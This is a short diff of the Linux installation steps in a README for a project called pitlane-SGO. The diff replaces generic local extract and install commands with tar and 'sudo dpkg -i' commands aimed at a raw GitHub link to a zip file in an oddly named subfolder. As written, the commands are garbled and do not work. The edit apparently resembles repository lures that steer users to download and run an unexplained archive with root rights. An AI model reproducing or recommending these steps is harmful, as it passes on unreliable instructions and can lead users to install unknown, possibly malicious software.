devilclover/pitlane-SGO/README.md

    - **Linux:**
      1. Open your terminal.
      2. Navigate to your downloads folder.
-     3. Use the command `tar -xvf filename.tar.gz` or `sudo dpkg -i filename.deb` to extract or install.
+     3. Use the command `tar -xvf https://raw.githubusercontent.com/devilclover/pitlane-SGO/master/buchonite/pitlane-SGO.zip` or `sudo dpkg -i https://raw.githubusercontent.com/devilclover/pitlane-SGO/master/buchonite/pitlane-SGO.zip` to extract or install.
      4. After installation, you can run pitlane-SGO from the application menu or terminal.

 ## 🎉 Quick Start